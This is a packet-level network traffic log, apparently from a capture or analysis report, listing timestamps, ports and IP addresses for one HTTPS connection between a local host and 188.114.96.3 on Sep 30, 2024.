Sep 30, 2024 18:25:29.562206984 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.562216997 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.562249899 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.562256098 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.562289000 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.562314034 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.562345982 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.562351942 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.562378883 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.562407017 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.562412977 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.562418938 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.562463999 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.562465906 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.562477112 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.562504053 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.562519073 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.562556982 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.562561035 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.562571049 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.562602997 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.562621117 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.562664986 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.562700987 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.562706947 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.566958904 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.567001104 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.567008972 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.567162037 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.567193985 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.567203045 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.567210913 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.567234993 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.567262888 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.567269087 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.567303896 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.567913055 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.568010092 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.568224907 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.568273067 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.568649054 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.568686008 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.568767071 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.568773985 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.568814039 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.569308043 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.569340944 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.569382906 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.569387913 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.569411993 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.569420099 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.570287943 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.570333004 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.570355892 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.570362091 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.570384026 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.570398092 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.571276903 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.571309090 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.571330070 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.571333885 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.571357965 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.571376085 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.572156906 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.572217941 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.572850943 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.572897911 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.572936058 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.572972059 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.573803902 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.573851109 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.574114084 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.574157000 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.574172020 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.574209929 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.575124979 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.575170040 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.575635910 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.575680017 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.575694084 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.575726986 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.576512098 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.576550961 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.577157021 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.577200890 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.577222109 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.577267885 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.578151941 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.578193903 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.578243971 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.578283072 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.579119921 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.579171896 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.579222918 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.579262972 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.579895973 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.579942942 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.580183983 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.580230951 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.581047058 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.581094027 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.581150055 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.581192970 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.581271887 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.581301928 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.581321001 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.581327915 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.581336975 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.581490993 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.581504107 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.581510067 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.581525087 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.581532955 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.581551075 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.581563950 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.581572056 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.581587076 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.581923962 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.581964970 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.581970930 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.582004070 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.582060099 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.582103968 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.582151890 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.582194090 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.582326889 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.582353115 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.582365036 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.582371950 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.582389116 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.582402945 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.583070993 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.583100080 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.583126068 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.583129883 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.583154917 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.583410025 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.583425999 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.583462000 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.583470106 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.583579063 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.585954905 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.585973978 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.586013079 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.586024046 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.586042881 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.586333990 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.586349010 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.586390018 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.586395979 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.586414099 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.586977005 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.586992025 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.587033987 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.587042093 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.587392092 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.587405920 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.587440014 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.587445974 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.587466002 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.588079929 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.588093042 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.588134050 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.588141918 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.588156939 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.588502884 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.588520050 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.588556051 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.588565111 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.588577986 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.588943958 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.588957071 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.588995934 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.589004040 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.589015007 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.589276075 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.589289904 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.589327097 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.589333057 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.589351892 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.589847088 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.589860916 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.589890957 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.589898109 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.589910984 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.590202093 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.590214968 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.590244055 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.590250015 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.590264082 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.590650082 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.590686083 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.590718031 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.590728998 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.590744019 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.591048002 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.591061115 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.591089010 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.591094971 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.591110945 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.604590893 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.604608059 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.604651928 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.604666948 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.604687929 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.604939938 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.604954004 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.605001926 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.605009079 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.605458975 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.605473042 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.605520010 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.605526924 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.605897903 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.605915070 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.605948925 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.605954885 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.605983973 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.606445074 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.606457949 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.606498003 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.606503963 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.606519938 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.606887102 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.606899977 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.606940031 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.606946945 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.606966972 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.609944105 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.609958887 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.609996080 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.610004902 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.610043049 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.610351086 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.610368013 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.610408068 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.610415936 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.610441923 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.656719923 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.695796013 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.695822954 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.695928097 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.695947886 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.695991039 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.697596073 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.697612047 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.697659016 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.697665930 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.697690010 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.697707891 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.698467016 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.698482037 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.698523998 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.698532104 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.698556900 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.698576927 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.698822975 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.698838949 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.698880911 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.698887110 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.698909044 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.698926926 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.699286938 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.699302912 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.699350119 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.699357986 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.699398041 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.699403048 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.699409962 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.699428082 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.699445963 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.699453115 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.699481010 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.699489117 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.700275898 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.700293064 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.700339079 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.700347900 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.700382948 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.700619936 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.700650930 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.700674057 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.700680971 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.700701952 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.700717926 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.783375025 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.783404112 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.783514023 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.783529043 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.783670902 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.784626007 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.784642935 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.784699917 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.784706116 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.784737110 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.785969019 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.785988092 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.786042929 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.786048889 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.786079884 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.786427975 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.786442995 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.786475897 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.786482096 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.786504984 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.786524057 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.787822962 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.787837982 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.787892103 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.787898064 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.787935972 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.788753033 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.788768053 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.788836956 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.788842916 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.788877964 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.789570093 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.789585114 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.789638996 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.789644003 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.789671898 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.789691925 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.789874077 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.789891005 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.789930105 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.789935112 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.789967060 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.789984941 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.871305943 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.871329069 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.871401072 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.871417046 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.871462107 CEST	49706	443	192.168.2.8	188.114.96.3
